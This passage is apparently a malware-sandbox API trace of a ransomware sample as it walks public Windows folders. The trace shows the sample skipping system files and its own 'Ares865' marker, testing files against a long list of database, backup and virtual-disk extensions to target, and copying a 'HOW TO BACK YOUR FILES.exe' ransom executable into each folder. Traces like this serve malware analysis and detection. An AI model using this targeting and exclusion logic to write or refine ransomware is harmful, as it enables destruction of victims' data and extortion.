(lpString1="Desert.jpg", lpString2="ids.txt") returned -1 [0040.256] lstrcmpiW (lpString1="Desert.jpg", lpString2="ntuser.dat") returned -1 [0040.256] lstrcmpiW (lpString1="Desert.jpg", lpString2="perflogs") returned -1 [0040.256] lstrcmpiW (lpString1="Desert.jpg", lpString2="MSBuild") returned -1 [0040.256] lstrlenW (lpString="Desert.jpg") returned 10 [0040.256] lstrlenW (lpString="C:\\Users\\Public\\Documents\\My Pictures\\Sample Pictures\\Chrysanthemum.jpg") returned 71 [0040.256] lstrcpyW (in: lpString1=0x2e2e8cc, lpString2="Desert.jpg" | out: lpString1="Desert.jpg") returned="Desert.jpg" [0040.256] lstrlenW (lpString="Desert.jpg") returned 10 [0040.256] lstrlenW (lpString="Ares865") returned 7 [0040.256] lstrcmpiW (lpString1="ert.jpg", lpString2="Ares865") returned 1 [0040.256] lstrlenW (lpString=".dll") returned 4 [0040.256] lstrcmpiW (lpString1="Desert.jpg", lpString2=".dll") returned 1 [0040.256] lstrlenW (lpString=".lnk") returned 4 [0040.256] lstrcmpiW (lpString1="Desert.jpg", lpString2=".lnk") returned 1 [0040.256] lstrlenW (lpString=".ini") returned 4 [0040.256] lstrcmpiW (lpString1="Desert.jpg", lpString2=".ini") returned 1 [0040.256] lstrlenW (lpString=".sys") returned 4 [0040.256] lstrcmpiW (lpString1="Desert.jpg", lpString2=".sys") returned 1 [0040.256] lstrlenW (lpString="Desert.jpg") returned 10 [0040.256] lstrlenW (lpString="bak") returned 3 [0040.256] lstrcmpiW (lpString1="jpg", lpString2="bak") returned 1 [0040.256] lstrlenW (lpString="ba_") returned 3 [0040.256] lstrcmpiW (lpString1="jpg", lpString2="ba_") returned 1 [0040.256] lstrlenW (lpString="dbb") returned 3 [0040.256] lstrcmpiW (lpString1="jpg", lpString2="dbb") returned 1 [0040.256] lstrlenW (lpString="vmdk") returned 4 [0040.256] lstrcmpiW (lpString1=".jpg", lpString2="vmdk") returned -1 [0040.256] lstrlenW (lpString="rar") returned 3 [0040.256] lstrcmpiW (lpString1="jpg", lpString2="rar") returned -1 [0040.256] lstrlenW (lpString="zip") returned 3 [0040.256] lstrcmpiW (lpString1="jpg", lpString2="zip") returned -1 [0040.256] lstrlenW (lpString="tgz") returned 3 [0040.257] lstrcmpiW (lpString1="jpg", lpString2="tgz") returned -1 [0040.257] lstrlenW (lpString="vbox") returned 4 [0040.257] lstrcmpiW (lpString1=".jpg", lpString2="vbox") returned -1 [0040.257] lstrlenW (lpString="vdi") returned 3 [0040.257] lstrcmpiW (lpString1="jpg", lpString2="vdi") returned -1 [0040.257] lstrlenW (lpString="vhd") returned 3 [0040.257] lstrcmpiW (lpString1="jpg", lpString2="vhd") returned -1 [0040.257] lstrlenW (lpString="vhdx") returned 4 [0040.257] lstrcmpiW (lpString1=".jpg", lpString2="vhdx") returned -1 [0040.257] lstrlenW (lpString="avhd") returned 4 [0040.257] lstrcmpiW (lpString1=".jpg", lpString2="avhd") returned -1 [0040.257] lstrlenW (lpString="db") returned 2 [0040.257] lstrcmpiW (lpString1="pg", lpString2="db") returned 1 [0040.257] lstrlenW (lpString="db2") returned 3 [0040.257] lstrcmpiW (lpString1="jpg", lpString2="db2") returned 1 [0040.257] lstrlenW (lpString="db3") returned 3 [0040.257] lstrcmpiW (lpString1="jpg", lpString2="db3") returned 1 [0040.257] lstrlenW (lpString="dbf") returned 3 [0040.257] lstrcmpiW (lpString1="jpg", lpString2="dbf") returned 1 [0040.257] lstrlenW (lpString="mdf") returned 3 [0040.257] lstrcmpiW (lpString1="jpg", lpString2="mdf") returned -1 [0040.257] lstrlenW (lpString="mdb") returned 3 [0040.257] lstrcmpiW (lpString1="jpg", lpString2="mdb") returned -1 [0040.257] lstrlenW (lpString="sql") returned 3 [0040.257] lstrcmpiW (lpString1="jpg", lpString2="sql") returned -1 [0040.257] lstrlenW (lpString="sqlite") returned 6 [0040.257] lstrcmpiW (lpString1="rt.jpg", lpString2="sqlite") returned -1 [0040.257] lstrlenW (lpString="sqlite3") returned 7 [0040.257] lstrcmpiW (lpString1="ert.jpg", lpString2="sqlite3") returned -1 [0040.257] lstrlenW (lpString="sqlitedb") returned 8 [0040.257] lstrcmpiW (lpString1="sert.jpg", lpString2="sqlitedb") returned -1 [0040.257] lstrlenW (lpString="xml") returned 3 [0040.257] lstrcmpiW (lpString1="jpg", lpString2="xml") returned -1 [0040.257] lstrlenW (lpString="$er") returned 3 [0040.257] lstrcmpiW (lpString1="jpg", lpString2="$er") returned 1 [0040.258] lstrlenW (lpString="4dd") returned 3 [0040.258] lstrcmpiW (lpString1="jpg", lpString2="4dd") returned 1 [0040.258] lstrlenW (lpString="4dl") returned 3 [0040.258] lstrcmpiW (lpString1="jpg", lpString2="4dl") returned 1 [0040.258] lstrlenW (lpString="^^^") returned 3 [0040.258] lstrcmpiW (lpString1="jpg", lpString2="^^^") returned 1 [0040.258] lstrlenW (lpString="abs") returned 3 [0040.258] lstrcmpiW (lpString1="jpg", lpString2="abs") returned 1 [0040.258] lstrlenW (lpString="abx") returned 3 [0040.258] lstrcmpiW (lpString1="jpg", lpString2="abx") returned 1 [0040.258] lstrlenW (lpString="accdb") returned 5 [0040.258] lstrcmpiW (lpString1="t.jpg", lpString2="accdb") returned 1 [0040.258] lstrlenW (lpString="accdc") returned 5 [0040.258] lstrcmpiW (lpString1="t.jpg", lpString2="accdc") returned 1 [0040.258] lstrlenW (lpString="accde") returned 5 [0040.258] lstrcmpiW (lpString1="t.jpg", lpString2="accde") returned 1 [0040.258] lstrlenW (lpString="accdr") returned 5 [0040.258] lstrcmpiW (lpString1="t.jpg", lpString2="accdr") returned 1 [0040.258] lstrlenW (lpString="accdt") returned 5 [0040.258] lstrcmpiW (lpString1="t.jpg", lpString2="accdt") returned 1 [0040.258] lstrlenW (lpString="accdw") returned 5 [0040.258] lstrcmpiW (lpString1="t.jpg", lpString2="accdw") returned 1 [0040.258] lstrlenW (lpString="accft") returned 5 [0040.258] lstrcmpiW (lpString1="t.jpg", lpString2="accft") returned 1 [0040.258] lstrlenW (lpString="adb") returned 3 [0040.258] lstrcmpiW (lpString1="jpg", lpString2="adb") returned 1 [0040.258] lstrlenW (lpString="adb") returned 3 [0040.258] lstrcmpiW (lpString1="jpg", lpString2="adb") returned 1 [0040.258] lstrlenW (lpString="ade") returned 3 [0040.258] lstrcmpiW (lpString1="jpg", lpString2="ade") returned 1 [0040.258] lstrlenW (lpString="adf") returned 3 [0040.258] lstrcmpiW (lpString1="jpg", lpString2="adf") returned 1 [0040.258] lstrlenW (lpString="adn") returned 3 [0040.258] lstrcmpiW (lpString1="jpg", lpString2="adn") returned 1 [0040.259] lstrlenW (lpString="adp") returned 3 [0040.259] lstrcmpiW (lpString1="jpg", lpString2="adp") returned 1 [0040.259] lstrlenW (lpString="alf") returned 3 [0040.259] lstrcmpiW (lpString1="jpg", lpString2="alf") returned 1 [0040.259] lstrlenW (lpString="ask") returned 3 [0040.259] lstrcmpiW (lpString1="jpg", lpString2="ask") returned 1 [0040.259] lstrlenW (lpString="btr") returned 3 [0040.259] lstrcmpiW (lpString1="jpg", lpString2="btr") returned 1 [0040.259] lstrlenW (lpString="cat") returned 3 [0040.259] lstrcmpiW (lpString1="jpg", lpString2="cat") returned 1 [0040.259] lstrlenW (lpString="cdb") returned 3 [0040.259] lstrcmpiW (lpString1="jpg", lpString2="cdb") returned 1 [0040.259] lstrlenW (lpString="ckp") returned 3 [0040.259] lstrcmpiW (lpString1="jpg", lpString2="ckp") returned 1 [0040.259] lstrlenW (lpString="cma") returned 3 [0040.259] lstrcmpiW (lpString1="jpg", lpString2="cma") returned 1 [0040.259] lstrlenW (lpString="cpd") returned 3 [0040.259] lstrcmpiW (lpString1="jpg", lpString2="cpd") returned 1 [0040.259] lstrlenW (lpString="dacpac") returned 6 [0040.259] lstrcmpiW (lpString1="rt.jpg", lpString2="dacpac") returned 1 [0040.259] lstrlenW (lpString="dad") returned 3 [0040.259] lstrcmpiW (lpString1="jpg", lpString2="dad") returned 1 [0040.259] lstrlenW (lpString="dadiagrams") returned 10 [0040.259] lstrlenW (lpString="daschema") returned 8 [0040.259] lstrcmpiW (lpString1="sert.jpg", lpString2="daschema") returned 1 [0040.259] lstrlenW (lpString="db-journal") returned 10 [0040.259] lstrlenW (lpString="db-shm") returned 6 [0040.259] lstrcmpiW (lpString1="rt.jpg", lpString2="db-shm") returned 1 [0040.259] lstrlenW (lpString="db-wal") returned 6 [0040.259] lstrcmpiW (lpString1="rt.jpg", lpString2="db-wal") returned 1 [0040.259] lstrlenW (lpString="dbc") returned 3 [0040.259] lstrcmpiW (lpString1="jpg", lpString2="dbc") returned 1 [0040.259] lstrlenW (lpString="dbs") returned 3 [0040.259] lstrcmpiW (lpString1="jpg", lpString2="dbs") returned 1 [0040.259] lstrlenW (lpString="dbt") returned 3 [0040.259] lstrcmpiW (lpString1="jpg", lpString2="dbt") returned 1 [0040.260] lstrlenW (lpString="dbv") returned 3 [0040.260] lstrcmpiW (lpString1="jpg", lpString2="dbv") returned 1 [0040.260] lstrlenW (lpString="dbx") returned 3 [0040.260] lstrcmpiW (lpString1="jpg", lpString2="dbx") returned 1 [0040.260] lstrlenW (lpString="dcb") returned 3 [0040.260] lstrcmpiW (lpString1="jpg", lpString2="dcb") returned 1 [0040.260] lstrcmpiW (lpString1="jpg", lpString2="dct") returned 1 [0040.260] lstrcmpiW (lpString1="jpg", lpString2="dcx") returned 1 [0040.260] lstrcpyW (in: lpString1=0x2e2e8cc, lpString2="desktop.ini" | out: lpString1="desktop.ini") returned="desktop.ini" [0040.260] lstrlenW (lpString="desktop.ini") returned 11 [0040.260] lstrlenW (lpString="Ares865") returned 7 [0040.260] lstrcmpiW (lpString1="top.ini", lpString2="Ares865") returned 1 [0040.260] lstrlenW (lpString=".dll") returned 4 [0040.260] lstrcmpiW (lpString1="desktop.ini", lpString2=".dll") returned 1 [0040.260] lstrlenW (lpString=".lnk") returned 4 [0040.260] lstrcmpiW (lpString1="desktop.ini", lpString2=".lnk") returned 1 [0040.260] lstrlenW (lpString=".ini") returned 4 [0040.260] lstrcmpiW (lpString1="desktop.ini", lpString2=".ini") returned 1 [0040.260] lstrlenW (lpString=".sys") returned 4 [0040.260] lstrcmpiW (lpString1="desktop.ini", lpString2=".sys") returned 1 [0040.260] lstrlenW (lpString="desktop.ini") returned 11 [0040.260] lstrcpyW (in: lpString1=0x2e2e8cc, lpString2="Hydrangeas.jpg" | out: lpString1="Hydrangeas.jpg") returned="Hydrangeas.jpg" [0040.260] lstrlenW (lpString="Hydrangeas.jpg") returned 14 [0040.260] lstrlenW (lpString="Ares865") returned 7 [0040.260] lstrcmpiW (lpString1="eas.jpg", lpString2="Ares865") returned 1 [0040.260] lstrlenW (lpString=".dll") returned 4 [0040.260] lstrcmpiW (lpString1="Hydrangeas.jpg", lpString2=".dll") returned 1 [0040.260] lstrlenW (lpString=".lnk") returned 4 [0040.261] lstrcmpiW (lpString1="Hydrangeas.jpg", lpString2=".lnk") returned 1 [0040.261] lstrlenW (lpString=".ini") returned 4 [0040.261] lstrcmpiW (lpString1="Hydrangeas.jpg", lpString2=".ini") returned 1 [0040.261] lstrlenW (lpString=".sys") returned 4 [0040.261] lstrcmpiW (lpString1="Hydrangeas.jpg", lpString2=".sys") returned 1 [0040.261] lstrlenW (lpString="Hydrangeas.jpg") returned 14 [0040.261] lstrcpyW (in: lpString1=0x2e2e8cc, lpString2="Jellyfish.jpg" | out: lpString1="Jellyfish.jpg") returned="Jellyfish.jpg" [0040.261] lstrlenW (lpString="Jellyfish.jpg") returned 13 [0040.261] lstrlenW (lpString="Ares865") returned 7 [0040.261] lstrcmpiW (lpString1="ish.jpg", lpString2="Ares865") returned 1 [0040.261] lstrlenW (lpString=".dll") returned 4 [0040.261] lstrcmpiW (lpString1="Jellyfish.jpg", lpString2=".dll") returned 1 [0040.261] lstrlenW (lpString=".lnk") returned 4 [0040.261] lstrcmpiW (lpString1="Jellyfish.jpg", lpString2=".lnk") returned 1 [0040.261] lstrlenW (lpString=".ini") returned 4 [0040.261] lstrcmpiW (lpString1="Jellyfish.jpg", lpString2=".ini") returned 1 [0040.261] lstrlenW (lpString=".sys") returned 4 [0040.261] lstrcmpiW (lpString1="Jellyfish.jpg", lpString2=".sys") returned 1 [0040.261] lstrlenW (lpString="Jellyfish.jpg") returned 13 [0040.261] lstrcpyW (in: lpString1=0x2e2e8cc, lpString2="Koala.jpg" | out: lpString1="Koala.jpg") returned="Koala.jpg" [0040.261] lstrlenW (lpString="Koala.jpg") returned 9 [0040.261] lstrlenW (lpString="Ares865") returned 7 [0040.261] lstrcmpiW (lpString1="ala.jpg", lpString2="Ares865") returned -1 [0040.261] lstrlenW (lpString=".dll") returned 4 [0040.261] lstrcmpiW (lpString1="Koala.jpg", lpString2=".dll") returned 1 [0040.261] lstrlenW (lpString=".lnk") returned 4 [0040.261] lstrcmpiW (lpString1="Koala.jpg", lpString2=".lnk") returned 1 [0040.261] lstrlenW (lpString=".ini") returned 4 [0040.261] lstrcmpiW (lpString1="Koala.jpg", lpString2=".ini") returned 1 [0040.261] lstrlenW (lpString=".sys") returned 4 [0040.261] lstrcmpiW (lpString1="Koala.jpg", lpString2=".sys") returned 1 [0040.261] lstrlenW (lpString="Koala.jpg") returned 9 [0040.261] lstrcpyW (in: lpString1=0x2e2e8cc, lpString2="Lighthouse.jpg" | out: lpString1="Lighthouse.jpg") returned="Lighthouse.jpg" [0040.262] lstrlenW (lpString="Lighthouse.jpg") returned 14 [0040.262] lstrlenW (lpString="Ares865") returned 7 [0040.262] lstrcmpiW (lpString1="use.jpg", lpString2="Ares865") returned 1 [0040.262] lstrlenW (lpString=".dll") returned 4 [0040.262] lstrcmpiW (lpString1="Lighthouse.jpg", lpString2=".dll") returned 1 [0040.262] lstrlenW (lpString=".lnk") returned 4 [0040.262] lstrcmpiW (lpString1="Lighthouse.jpg", lpString2=".lnk") returned 1 [0040.262] lstrlenW (lpString=".ini") returned 4 [0040.262] lstrcmpiW (lpString1="Lighthouse.jpg", lpString2=".ini") returned 1 [0040.262] lstrlenW (lpString=".sys") returned 4 [0040.262] lstrcmpiW (lpString1="Lighthouse.jpg", lpString2=".sys") returned 1 [0040.262] lstrlenW (lpString="Lighthouse.jpg") returned 14 [0040.262] lstrcpyW (in: lpString1=0x2e2e8cc, lpString2="Penguins.jpg" | out: lpString1="Penguins.jpg") returned="Penguins.jpg" [0040.262] lstrlenW (lpString="Penguins.jpg") returned 12 [0040.262] lstrlenW (lpString="Ares865") returned 7 [0040.262] lstrcmpiW (lpString1="ins.jpg", lpString2="Ares865") returned 1 [0040.262] lstrlenW (lpString=".dll") returned 4 [0040.262] lstrcmpiW (lpString1="Penguins.jpg", lpString2=".dll") returned 1 [0040.262] lstrlenW (lpString=".lnk") returned 4 [0040.262] lstrcmpiW (lpString1="Penguins.jpg", lpString2=".lnk") returned 1 [0040.262] lstrlenW (lpString=".ini") returned 4 [0040.262] lstrcmpiW (lpString1="Penguins.jpg", lpString2=".ini") returned 1 [0040.262] lstrlenW (lpString=".sys") returned 4 [0040.262] lstrcmpiW (lpString1="Penguins.jpg", lpString2=".sys") returned 1 [0040.262] lstrlenW (lpString="Penguins.jpg") returned 12 [0040.262] lstrcpyW (in: lpString1=0x2e2e8cc, lpString2="Tulips.jpg" | out: lpString1="Tulips.jpg") returned="Tulips.jpg" [0040.262] lstrlenW (lpString="Tulips.jpg") returned 10 [0040.262] lstrlenW (lpString="Ares865") returned 7 [0040.262] lstrcmpiW (lpString1="ips.jpg", lpString2="Ares865") returned 1 [0040.262] lstrlenW (lpString=".dll") returned 4 [0040.262] lstrcmpiW (lpString1="Tulips.jpg", lpString2=".dll") returned 1 [0040.262] lstrlenW (lpString=".lnk") returned 4 [0040.263] lstrcmpiW (lpString1="Tulips.jpg", lpString2=".lnk") returned 1 [0040.263] lstrlenW (lpString=".ini") returned 4 [0040.263] lstrcmpiW (lpString1="Tulips.jpg", lpString2=".ini") returned 1 [0040.263] lstrlenW (lpString=".sys") returned 4 [0040.263] lstrcmpiW (lpString1="Tulips.jpg", lpString2=".sys") returned 1 [0040.263] lstrlenW (lpString="Tulips.jpg") returned 10 [0040.263] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Users\\Public\\Documents\\My Music", iMaxLength=260 | out: lpString1="C:\\Users\\Public\\Documents\\My Music") returned="C:\\Users\\Public\\Documents\\My Music" [0040.263] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2ee8d0 | out: hHeap=0x2b0000) returned 1 [0040.263] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7cc8 | out: hHeap=0x2b0000) returned 1 [0040.263] lstrlenW (lpString="C:\\Users\\Public\\Documents\\My Music") returned 34 [0040.263] lstrcatW (in: lpString1="", lpString2="C:\\Users\\Public\\Documents\\My Music" | out: lpString1="C:\\Users\\Public\\Documents\\My Music") returned="C:\\Users\\Public\\Documents\\My Music" [0040.263] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0040.263] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\Public\\Documents\\My Music\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\public\\documents\\my music\\how to back your files.exe"), bFailIfExists=1) returned 0 [0040.264] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x124 [0040.264] GetLastError () returned 0x0 [0040.264] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x2f8fb0 [0040.264] ReadFile (in: hFile=0x124, lpBuffer=0x2f8fb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2e2e53c, lpOverlapped=0x0 | out: lpBuffer=0x2f8fb0*, lpNumberOfBytesRead=0x2e2e53c*=0x1dc00, lpOverlapped=0x0) returned 1 [0040.264] CloseHandle (hObject=0x124) returned 1 [0040.264] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2f8fb0 | out: hHeap=0x2b0000) returned 1 [0040.264] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0040.264] FindFirstFileW (in: lpFileName="C:\\Users\\Public\\Documents\\My Music\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfdb0c77c, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x4977eaa0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4977eaa0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccfa8 [0040.264] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0040.264] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0040.264] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0040.264] FindNextFileW (in: hFindFile=0x2ccfa8, lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfdb0c77c, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x4977eaa0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4977eaa0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0040.264] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0040.264] lstrcmpiW (lpString1="..", lpString2="aoldtz.exe") returned -1 [0040.264] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0040.265] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0040.265] FindNextFileW (in: hFindFile=0x2ccfa8, lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x28305c4e, ftCreationTime.dwHighDateTime=0x1ca043f, ftLastAccessTime.dwLowDateTime=0x28305c4e, ftLastAccessTime.dwHighDateTime=0x1ca043f, ftLastWriteTime.dwLowDateTime=0x288ad099, ftLastWriteTime.dwHighDateTime=0x1ca043f, nFileSizeHigh=0x0, nFileSizeLow=0x17c, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0040.265] lstrcmpiW (lpString1="desktop.ini", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0040.265] lstrcmpiW (lpString1="desktop.ini", lpString2="aoldtz.exe") returned 1 [0040.265] lstrcmpiW (lpString1="desktop.ini", lpString2=".") returned 1 [0040.265] lstrcmpiW (lpString1="desktop.ini", lpString2="..") returned 1 [0040.265] lstrcmpiW (lpString1="desktop.ini", lpString2="windows") returned -1 [0040.265] lstrcmpiW (lpString1="desktop.ini", lpString2="bootmgr") returned 1 [0040.265] lstrcmpiW (lpString1="desktop.ini", lpString2="temp") returned -1 [0040.265] lstrcmpiW (lpString1="desktop.ini", lpString2="pagefile.sys") returned -1 [0040.265] lstrcmpiW (lpString1="desktop.ini", lpString2="boot") returned 1 [0040.265] lstrcmpiW (lpString1="desktop.ini", lpString2="ids.txt") returned -1 [0040.265] lstrcmpiW (lpString1="desktop.ini", lpString2="ntuser.dat") returned -1 [0040.265] lstrcmpiW (lpString1="desktop.ini", lpString2="perflogs") returned -1 [0040.265] lstrcmpiW (lpString1="desktop.ini", lpString2="MSBuild") returned -1 [0040.265] lstrlenW (lpString="desktop.ini") returned 11 [0040.265] lstrlenW (lpString="C:\\Users\\Public\\Documents\\My Music\\*") returned 36 [0040.265] lstrcpyW (in: lpString1=0x2e2e8a6, lpString2="desktop.ini" | out: lpString1="desktop.ini") returned="desktop.ini" [0040.265] lstrlenW (lpString="desktop.ini") returned 11 [0040.265] lstrlenW (lpString="Ares865") returned 7 [0040.265] lstrcmpiW (lpString1="top.ini", lpString2="Ares865") returned 1 [0040.265] lstrlenW (lpString=".dll") returned 4 [0040.265] lstrcmpiW (lpString1="desktop.ini", lpString2=".dll") returned 1 [0040.265] lstrlenW (lpString=".lnk") returned 4 [0040.265] lstrcmpiW (lpString1="desktop.ini", lpString2=".lnk") returned 1 [0040.265] lstrlenW (lpString=".ini") returned 4 [0040.265] lstrcmpiW (lpString1="desktop.ini", lpString2=".ini") returned 1 [0040.265] lstrlenW (lpString=".sys") returned 4 [0040.265] lstrcmpiW (lpString1="desktop.ini", lpString2=".sys") returned 1 [0040.265] lstrlenW (lpString="desktop.ini") returned 11 [0040.265] lstrlenW (lpString="bak") returned 3 [0040.265] lstrcmpiW (lpString1="ini", lpString2="bak") returned 1 [0040.265] lstrlenW (lpString="ba_") returned 3 [0040.265] lstrcmpiW (lpString1="ini", lpString2="ba_") returned 1 [0040.265] lstrlenW (lpString="dbb") returned 3 [0040.266] lstrcmpiW (lpString1="ini", lpString2="dbb") returned 1 [0040.266] lstrlenW (lpString="vmdk") returned 4 [0040.266] lstrcmpiW (lpString1=".ini", lpString2="vmdk") returned -1 [0040.266] lstrlenW (lpString="rar") returned 3 [0040.266] lstrcmpiW (lpString1="ini", lpString2="rar") returned -1 [0040.266] lstrlenW (lpString="zip") returned 3 [0040.266] lstrcmpiW (lpString1="ini", lpString2="zip") returned -1 [0040.266] lstrlenW (lpString="tgz") returned 3 [0040.266] lstrcmpiW (lpString1="ini", lpString2="tgz") returned -1 [0040.266] lstrlenW (lpString="vbox") returned 4 [0040.266] lstrcmpiW (lpString1=".ini", lpString2="vbox") returned -1 [0040.266] lstrlenW (lpString="vdi") returned 3 [0040.266] lstrcmpiW (lpString1="ini", lpString2="vdi") returned -1 [0040.266] lstrlenW (lpString="vhd") returned 3 [0040.266] lstrcmpiW (lpString1="ini", lpString2="vhd") returned -1 [0040.266] lstrlenW (lpString="vhdx") returned 4 [0040.266] lstrcmpiW (lpString1=".ini", lpString2="vhdx") returned -1 [0040.266] lstrlenW (lpString="avhd") returned 4 [0040.266] lstrcmpiW (lpString1=".ini", lpString2="avhd") returned -1 [0040.266] lstrlenW (lpString="db") returned 2 [0040.266] lstrcmpiW (lpString1="ni", lpString2="db") returned 1 [0040.266] lstrlenW (lpString="db2") returned 3 [0040.266] lstrcmpiW (lpString1="ini", lpString2="db2") returned 1 [0040.266] lstrlenW (lpString="db3") returned 3 [0040.266] lstrcmpiW (lpString1="ini", lpString2="db3") returned 1 [0040.266] lstrlenW (lpString="dbf") returned 3 [0040.266] lstrcmpiW (lpString1="ini", lpString2="dbf") returned 1 [0040.266] lstrlenW (lpString="mdf") returned 3 [0040.266] lstrcmpiW (lpString1="ini", lpString2="mdf") returned -1 [0040.266] lstrlenW (lpString="mdb") returned 3 [0040.266] lstrcmpiW (lpString1="ini", lpString2="mdb") returned -1 [0040.266] lstrlenW (lpString="sql") returned 3 [0040.266] lstrcmpiW (lpString1="ini", lpString2="sql") returned -1 [0040.266] lstrlenW (lpString="sqlite") returned 6 [0040.266] lstrcmpiW (lpString1="op.ini", lpString2="sqlite") returned -1 [0040.266] lstrlenW (lpString="sqlite3") returned 7 [0040.267] lstrcmpiW (lpString1="top.ini", lpString2="sqlite3") returned 1 [0040.267] lstrlenW (lpString="sqlitedb") returned 8 [0040.267] lstrcmpiW (lpString1="ktop.ini", lpString2="sqlitedb") returned -1 [0040.267] lstrlenW (lpString="xml") returned 3 [0040.267] lstrcmpiW (lpString1="ini", lpString2="xml") returned -1 [0040.267] lstrlenW (lpString="$er") returned 3 [0040.267] lstrcmpiW (lpString1="ini", lpString2="$er") returned 1 [0040.267] lstrlenW (lpString="4dd") returned 3 [0040.267] lstrcmpiW (lpString1="ini", lpString2="4dd") returned 1 [0040.267] lstrlenW (lpString="4dl") returned 3 [0040.267] lstrcmpiW (lpString1="ini", lpString2="4dl") returned 1 [0040.267] lstrlenW (lpString="^^^") returned 3 [0040.267] lstrcmpiW (lpString1="ini", lpString2="^^^") returned 1 [0040.267] lstrlenW (lpString="abs") returned 3 [0040.267] lstrcmpiW (lpString1="ini", lpString2="abs") returned 1 [0040.267] lstrlenW (lpString="abx") returned 3 [0040.267] lstrcmpiW (lpString1="ini", lpString2="abx") returned 1 [0040.267] lstrlenW (lpString="accdb") returned 5 [0040.267] lstrcmpiW (lpString1="p.ini", lpString2="accdb") returned 1 [0040.267] lstrlenW (lpString="accdc") returned 5 [0040.267] lstrcmpiW (lpString1="p.ini", lpString2="accdc") returned 1 [0040.267] lstrlenW (lpString="accde") returned 5 [0040.267] lstrcmpiW (lpString1="p.ini", lpString2="accde") returned 1 [0040.267] lstrlenW (lpString="accdr") returned 5 [0040.267] lstrcmpiW (lpString1="p.ini", lpString2="accdr") returned 1 [0040.267] lstrlenW (lpString="accdt") returned 5 [0040.267] lstrcmpiW (lpString1="p.ini", lpString2="accdt") returned 1 [0040.267] lstrlenW (lpString="accdw") returned 5 [0040.267] lstrcmpiW (lpString1="p.ini", lpString2="accdw") returned 1 [0040.267] lstrlenW (lpString="accft") returned 5 [0040.267] lstrcmpiW (lpString1="p.ini", lpString2="accft") returned 1 [0040.267] lstrlenW (lpString="adb") returned 3 [0040.267] lstrcmpiW (lpString1="ini", lpString2="adb") returned 1 [0040.267] lstrlenW (lpString="adb") returned 3 [0040.267] lstrcmpiW (lpString1="ini", lpString2="adb") returned 1 [0040.267] lstrlenW (lpString="ade") returned 3 [0040.267] lstrcmpiW (lpString1="ini", lpString2="ade") returned 1 [0040.268] lstrlenW (lpString="adf") returned 3 [0040.268] lstrcmpiW (lpString1="ini", lpString2="adf") returned 1 [0040.268] lstrlenW (lpString="adn") returned 3 [0040.268] lstrcmpiW (lpString1="ini", lpString2="adn") returned 1 [0040.268] lstrlenW (lpString="adp") returned 3 [0040.268] lstrcmpiW (lpString1="ini", lpString2="adp") returned 1 [0040.268] lstrlenW (lpString="alf") returned 3 [0040.268] lstrcmpiW (lpString1="ini", lpString2="alf") returned 1 [0040.268] lstrlenW (lpString="ask") returned 3 [0040.268] lstrcmpiW (lpString1="ini", lpString2="ask") returned 1 [0040.268] lstrlenW (lpString="btr") returned 3 [0040.268] lstrcmpiW (lpString1="ini", lpString2="btr") returned 1 [0040.268] lstrlenW (lpString="cat") returned 3 [0040.268] lstrcmpiW (lpString1="ini", lpString2="cat") returned 1 [0040.268] lstrlenW (lpString="cdb") returned 3 [0040.268] lstrcmpiW (lpString1="ini", lpString2="cdb") returned 1 [0040.268] lstrlenW (lpString="ckp") returned 3 [0040.268] lstrcmpiW (lpString1="ini", lpString2="ckp") returned 1 [0040.268] lstrlenW (lpString="cma") returned 3 [0040.268] lstrcmpiW (lpString1="ini", lpString2="cma") returned 1 [0040.268] lstrlenW (lpString="cpd") returned 3 [0040.268] lstrcmpiW (lpString1="ini", lpString2="cpd") returned 1 [0040.268] lstrlenW (lpString="dacpac") returned 6 [0040.268] lstrcmpiW (lpString1="op.ini", lpString2="dacpac") returned 1 [0040.268] lstrlenW 